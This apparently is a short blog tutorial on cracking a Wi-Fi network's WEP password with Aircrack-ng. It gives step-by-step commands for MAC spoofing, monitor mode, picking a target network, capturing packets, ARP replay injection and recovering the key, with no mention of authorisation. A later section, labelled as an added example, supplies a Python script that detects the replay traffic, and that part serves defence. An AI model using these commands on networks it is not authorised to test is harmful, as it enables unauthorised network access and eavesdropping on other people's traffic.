17.04.10 - Crack WIFI network's WEP password with Aircrack
How to crack a WIFI network's WEP password with Aircrack suite
The first step is to download the Aircrack-ng suite.
In order to decrypt the WEP key we have to follow the next simple steps:
First, change your hardware address (MAC):
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:11:22:33:44:55
Now, start packet monitoring on the wifi interface (for example, wlan0). For this we use the airmon-ng tool:
# airmon-ng start wlan0
At this point we need the data necessary to attack the network we are interested in. We obtain it with:
# airodump-ng wlan0
It will print a list of the networks in range.
This step is only to get the information needed to attack the network. Of all the networks, the best choice will probably be the one with the least power (PWR column). Once we have chosen one of them, we have to note the data shown in blue: the BSSID (MAC address of the access point), PWR (power of the signal), CH (channel of the network), ENC and CIPHER (network security type) and ESSID (access point name).
Once we have all the data needed to crack the wifi, we can start sniffing the packets of that network. In our case we have selected "WLAN_DF", on channel 2 with BSSID 00:23:F8:A0:C4:A2:
# airodump-ng -c 2 -w packages --bssid 00:23:F8:A0:C4:A2 wlan0
At this point we only have to wait until about 20000 - 40000 packets have been collected; it depends on how much the network is used.
Optional: packet injection
If our wifi driver supports packet injection, we can speed up packet collection with the aireplay-ng tool. It is used like this:
# aireplay-ng -1 0 -a 00:23:F8:A0:C4:A2 -h 00:11:22:33:44:55 -e WLAN_DF wlan0
# aireplay-ng -3 -b 00:23:F8:A0:C4:A2 -h 00:11:22:33:44:55 wlan0
Getting the network key
Once we have collected a good number of packets (20000 - 40000), we can try to recover the key with the final tool, aircrack-ng:
# aircrack-ng packages-01.cap
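Seen from the defender's side, the optional injection step is visible on the air: ARP request replay (aireplay-ng -3) re-sends one captured encrypted frame, so the same 24-bit WEP IV keeps arriving from a single transmitter. The detector below is an added example, not part of the original post; the record format (timestamp, transmitter MAC, IV), the window and threshold values and the sample frames are constructed assumptions.

```python
from collections import defaultdict, deque

def find_iv_replays(frames, window=1.0, threshold=20):
    """Return {(transmitter, iv): peak_count} for every IV that one
    transmitter repeated at least `threshold` times within `window` seconds.

    frames: iterable of (timestamp_seconds, transmitter_mac, iv_hex),
    sorted by timestamp, one tuple per WEP-encrypted data frame.
    """
    recent = defaultdict(deque)  # (mac, iv) -> timestamps still inside the window
    alerts = {}
    for ts, mac, iv in frames:
        key = (mac.lower(), iv.lower())
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts

def build_sample():
    """Constructed capture metadata for the demo, not real traffic."""
    frames = []
    # Normal station: a fresh IV on every frame, 50 frames over 5 s.
    for i in range(50):
        frames.append((i * 0.1, "00:aa:bb:cc:dd:01", f"{0x10a000 + i:06x}"))
    # Link-layer retries: the same IV seen 3 times, well below the threshold.
    for i in range(3):
        frames.append((1.0 + i * 0.002, "00:aa:bb:cc:dd:01", "10b000"))
    # Replay source: one captured frame re-sent 500 times per second for 2 s.
    for i in range(1000):
        frames.append((2.0 + i * 0.002, "00:11:22:33:44:55", "3f91c2"))
    return sorted(frames)

if __name__ == "__main__":
    for (mac, iv), peak in find_iv_replays(build_sample()).items():
        print(f"possible ARP replay: {mac} repeated IV {iv} {peak}x within 1 s")
```

The threshold has to sit above the handful of repeats that ordinary 802.11 retransmissions produce, which is why the three-retry case in the sample stays silent.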
Download: Aircrack-ng

THANKS A LOT